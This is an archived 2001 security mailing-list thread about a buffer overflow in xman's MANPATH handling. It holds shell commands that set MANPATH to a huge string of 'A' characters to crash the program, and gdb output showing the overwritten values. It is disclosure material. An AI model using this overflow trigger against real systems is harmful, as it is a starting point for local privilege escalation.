Re: suid xman 3.1.6 overflows

From: Matias Sedalo (s0t4ipv6at_private)
Date: Mon Jul 16 2001 - 00:16:11 PDT

Next message: Paul Allman: "RE: cayman strikes again"

Previous message: Ken Brown: "Re: Win2K/NTFS messes file creation time/date"
In reply to: KF: "suid xman 3.1.6 overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0
but...\

s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
s0t4ipv6@gohan:~$ xman
Xman Error: No manual pages found.
s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
s0t4ipv6@gohan:~$ xman
Segmentation fault
s0t4ipv6@gohan:~$ uname -a 
Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown

================================================================
Matias Sedalo.______________________http://www.shellcode.com.ar/

On Wed, 11 Jul 2001, KF wrote:

> xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
> overflow 
> 
> srtxgat_private is noted as the packager of this RPM. I do not
> know 
> the author. 
> 
> [root@linux lib]# ls -al `which xman`
> -rwxr-sr-x    1 root     man         41076 Jun 17  1998
> /usr/X11R6/bin/xman*
> 
> [root@linux lib]# xman
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
> [root@linux lib]# xman
> Xman Error: Could not allocate memory for manual sections.
> 
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
> [root@linux lib]# xman
> Segmentation fault
> 
> [root@linux lib]# gdb xman
> GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
> (gdb) run
> Starting program: /usr/X11R6/bin/xman
> 0x4022fb66 in getenv () from /lib/libc.so.6
> (gdb) bt
> #0  0x4022fb66 in getenv () from /lib/libc.so.6
> #1  0x0804bc47 in _start ()
> #2  0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> 
> (gdb) info registers
> eax            0xbffee784       -1073813628
> ecx            0x804fb29        134544169
> edx            0x805414c        134562124
> ebx            0x40328f2c       1077055276
> esp            0xbffec6fc       0xbffec6fc
> ebp            0xbffec714       0xbffec714
> esi            0x6      6
> edi            0x41414141       1094795585
> eip            0x4022fb66       0x4022fb66
> 
> -KF
>

Next message: Paul Allman: "RE: cayman strikes again"
Previous message: Ken Brown: "Re: Win2K/NTFS messes file creation time/date"
In reply to: KF: "suid xman 3.1.6 overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 09:13:33 PDT